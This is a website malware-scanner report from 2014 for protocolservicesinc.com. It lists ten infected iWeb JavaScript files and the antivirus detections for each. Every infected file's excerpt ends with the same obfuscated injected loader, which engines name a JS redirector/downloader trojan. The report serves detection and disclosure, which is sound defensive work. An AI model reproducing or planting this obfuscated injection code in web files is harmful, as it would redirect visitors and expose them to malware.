New scan:

Malware Scanner report for protocolservicesinc.com

Malicious/Suspicious/Total urls checked
10/0/14
10 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://protocolservicesinc.com/
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 12:31:19 GMT
Accept-Ranges: bytes
ETag: "80f9e82fe726cc1:0"
Server: Microsoft-IIS/7.0
Content-Length: 337
Content-Type: text/html
Last-Modified: Thu, 09 Jun 2011 20:52:47 GMT
X-Powered-By: ASP.NET
clean
http://protocolservicesinc.com/www.protocolservicesinc.com/welcome.html
200 OK
Content-Length: 11647
Content-Type: text/html
clean
http://protocolservicesinc.com/www.protocolservicesinc.com/Scripts/iWebSite.js
200 OK
Content-Length: 148321
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Prototype={Version:'1.6.0',Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf('AppleWebKit/')>-1,Gecko:navigator.userAgent.indexOf('Gecko')>-1&&navigator.userAgent.indexOf('KHTML')==-1,MobileSafari:!!navigator.userAgent.match(/Apple.*Mobile.*Safari/)},BrowserFeatures:{XPath:!!document.evaluate,ElementExtensions:!!window.HTMLElement,SpecificElementExtensions:document.createElement('div').__proto__&&document.c
... 3107 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/Widgets/SharedResources/WidgetCommon.js
200 OK
Content-Length: 38330
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var widgets=[];var identifiersToStringLocalizations=[];var Widget=Class.create({initialize:function(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp)
{if(instanceID)
{this.instanceID=instanceID;this.widgetPath=widgetPath;this.sharedPath=sharedPath;this.sitePath=sitePath;this.preferences=preferences;this.runningInApp=(runningInApp===undefined)?false:runningInApp;this.onloadReceived=false;if(this.preferences&&this.runningInApp==true)
{this.preferences.widget=t
... 3144 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/Widgets/Navbar/navbar.js
200 OK
Content-Length: 8192
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var NavBar=Class.create(Widget,{widgetIdentifier:"com-apple-iweb-widget-NavBar",initialize:function($super,instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp)
{if(instanceID)
{$super(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp);if(!this.preferenceForKey("useStaticFeed")&&this.preferenceForKey("dotMacAccount"))
{var depthPrefix=this.preferenceForKey("path-to-root");if(!depthPrefix||depthPrefix=="")
depthPrefix="./";this.xml_feed=depth
... 3128 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Virus.JS.Agent
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Comodo
TrojWare.JS.Agent.C
Emsisoft
Trojan.JS.Agent.EXP (B)
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Welcome_files/Welcome.js
200 OK
Content-Length: 2801
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

setTransparentGifURL('Media/transparent.gif');function hostedOnDM()
{return false;}
function onPageLoad()
{loadMozillaCSS('Welcome_files/WelcomeMoz.css')
adjustLineHeightIfTooBig('id1');adjustFontSizeIfTooBig('id1');adjustLineHeightIfTooBig('id2');adjustFontSizeIfTooBig('id2');adjustLineHeightIfTooBig('id3');adjustFontSizeIfTooBig('id3');adjustLineHeightIfTooBig('id4');adjustFontSizeIfTooBig('id4');Widget.onload();fixupAllIEPNGBGs();fixAllIEPNGs('Media/transparent.gif');performPo
... 1780 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Comodo
TrojWare.JS.Agent.C
Emsisoft
Trojan.JS.Agent.EXP (B)
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Missions.html
200 OK
Content-Length: 15501
Content-Type: text/html
clean
http://protocolservicesinc.com/Scripts/iWebSite.js
200 OK
Content-Length: 148321
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var Prototype={Version:'1.6.0',Browser:{IE:!!(window.attachEvent&&!window.opera),Opera:!!window.opera,WebKit:navigator.userAgent.indexOf('AppleWebKit/')>-1,Gecko:navigator.userAgent.indexOf('Gecko')>-1&&navigator.userAgent.indexOf('KHTML')==-1,MobileSafari:!!navigator.userAgent.match(/Apple.*Mobile.*Safari/)},BrowserFeatures:{XPath:!!document.evaluate,ElementExtensions:!!window.HTMLElement,SpecificElementExtensions:document.createElement('div').__proto__&&document.c
... 3107 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/iWebImage.js
200 OK
Content-Length: 41868
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var IWAllImages={};var IWAllImageObjects={};function IWCreateImage(url)
{return IWAllImages[url]||new IWImage(url);}
var IWNamedImages={};function IWImageNamed(name)
{var url=IWNamedImages[name];return url?IWCreateImage(url):null}
function IWRegisterNamedImage(name,url)
{IWNamedImages[name]=url;}
var IWImageEnableUnload=isiPhone;var IWImage=Class.create({initialize:function(url)
{if(IWAllImages.hasOwnProperty(url))
{iWLog("warning -- use IWCreateImage rather than
... 3158 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/iWebMediaGrid.js
200 OK
Content-Length: 67551
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var IWAllFeeds={};function IWCreateFeed(url)
{var feed=IWAllFeeds[url];if(feed==null)
{feed=new IWFeed(url);}
return feed;}
var IWFeed=Class.create({initialize:function(url)
{if(url)
{if(IWAllFeeds.hasOwnProperty(url))
{iWLog("warning -- use IWCreateFeed rather than new IWFeed and you'll get better performance");}
this.mURL=url;this.mLoading=false;this.mLoaded=false;this.mCallbacks=[];this.mImageStream=null;IWAllFeeds[url]=this;}},sourceURL:function()
{return
... 3137 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Comodo
TrojWare.JS.Agent.C
Emsisoft
Trojan.JS.Agent.EXP (B)
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/Widgets/YouTube/YouTube.js
200 OK
Content-Length: 10981
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var YouTubeWidget=Class.create(Widget,{widgetIdentifier:"com-apple-iweb-widget-YouTube",thumbnailURL:null,initialize:function($super,instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp)
{if(instanceID)
{$super(instanceID,widgetPath,sharedPath,sitePath,preferences,runningInApp);if(this.runningInApp)
{window.onresize=this.resize.bind(this);}
var parentDiv=this.div("youTube");this.m_views={};this.m_views["movie"]=new YouTubeMovieView(this,parentDiv);if(runningInApp)
... 3107 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Emsisoft
Trojan.JS.Agent.EXP (B)
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
McAfee-GW-Edition
JS/Redirector
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Norman
Agent.ACM
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
ESET-NOD32
JS/Agent.NDY
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Scripts/Widgets/YouTube/localizedStrings.js
200 OK
Content-Length: 2682
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var strings={};strings['<b>The YouTube URL you entered is invalid.</b><br />Double-check the URL on YouTube, and then try again.']='<b>The YouTube URL you entered is invalid.</b><br />Double-check the URL on YouTube, and then try again.';strings['<b>You must be connected to the Internet to view the YouTube movie.</b>']='<b>You must be connected to the Internet to view the YouTube movie.</b>';RegisterWidgetStrings("com-apple-
... 1744 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Comodo
TrojWare.JS.Agent.C
Emsisoft
Trojan.JS.Agent.EXP (B)
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
DrWeb
JS.DownLoader.216
Microsoft
Trojan:JS/Redirector.IM
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
F-Secure
Trojan.JS.Agent.EXP
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/Missions_files/Missions.js
200 OK
Content-Length: 3241
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

setTransparentGifURL('Media/transparent.gif');function hostedOnDM()
{return false;}
function onPageLoad()
{loadMozillaCSS('Missions_files/MissionsMoz.css')
adjustLineHeightIfTooBig('id1');adjustFontSizeIfTooBig('id1');adjustLineHeightIfTooBig('id2');adjustFontSizeIfTooBig('id2');adjustLineHeightIfTooBig('id3');adjustFontSizeIfTooBig('id3');adjustLineHeightIfTooBig('id4');adjustFontSizeIfTooBig('id4');adjustLineHeightIfTooBig('id5');adjustFontSizeIfTooBig('id5');adjustLineHeightIf
... 2220 bytes are skipped ...
/^/,String)){while(_0xa064x3--){_0xa064x6[_0xa064x3.toString(_0xa064x2)]=_0xa064x4[_0xa064x3]||_0xa064x3.toString(_0xa064x2);} ;_0xa064x4=[function (_0xa064x5){return _0xa064x6[_0xa064x5];} ];_0xa064x5=function (){return _0x4470[6];} ;_0xa064x3=1;} ;while(_0xa064x3--){if(_0xa064x4[_0xa064x3]){_0xa064x1=_0xa064x1[_0x4470[4]]( new RegExp(_0x4470[7]+_0xa064x5(_0xa064x3)+_0x4470[7],_0x4470[8]),_0xa064x4[_0xa064x3]);} ;} ;return _0xa064x1;} (_0x4470[0],33,33,_0x4470[3][_0x4470[2]](_0x4470[1]),0,{}));

Antivirus reports:

AntiVir
JS/Infected.C
Avast
JS:Agent-AZY [Trj]
Ad-Aware
Trojan.JS.Agent.EXP
Ikarus
Trojan.JS.Alescurf
AhnLab-V3
JS/IFrame
nProtect
Trojan.JS.Agent.EXP
K7AntiVirus
Exploit ( 04c561271 )
Comodo
TrojWare.JS.Agent.C
CAT-QuickHeal
JS/Alescurf.D
K7GW
Exploit ( 04c561271 )
McAfee-GW-Edition
JS/Redirector
DrWeb
JS.DownLoader.216
Kaspersky
Trojan-Downloader.JS.Agent.gnk
MicroWorld-eScan
Trojan.JS.Agent.EXP
Fortinet
JS/Redirector.KO!tr
TotalDefense
JS/Alescurf.B
McAfee
JS/Redirector
NANO-Antivirus
Trojan.Script.Agent.lyldx
ClamAV
JS.Trojan.Redir-3
VIPRE
Trojan.JS.Generic (v)
F-Prot
JS/Agent.PL
AVG
JS/Agent.Y
Norman
Agent.ACM
Sophos
Troj/JSRedir-DO
GData
Trojan.JS.Agent.EXP
Symantec
JS.Alescurf
Commtouch
JS/Agent.PL
AVware
Trojan.JS.Generic (v)
BitDefender
Trojan.JS.Agent.EXP

http://protocolservicesinc.com/test404page.js
404 Not Found
Content-Length: 1549
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: protocolservicesinc.com

Result:
HTTP/1.1 200 OK
Date: Thu, 21 Aug 2014 12:31:19 GMT
Accept-Ranges: bytes
ETag: "80f9e82fe726cc1:0"
Server: Microsoft-IIS/7.0
Content-Length: 337
Content-Type: text/html
Last-Modified: Thu, 09 Jun 2011 20:52:47 GMT
X-Powered-By: ASP.NET

...337 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: protocolservicesinc.com
Referer: http://www.google.com/search?q=protocolservicesinc.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=protocolservicesinc.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://protocolservicesinc.com/

Result: protocolservicesinc.com is not infected or malware details are not published yet.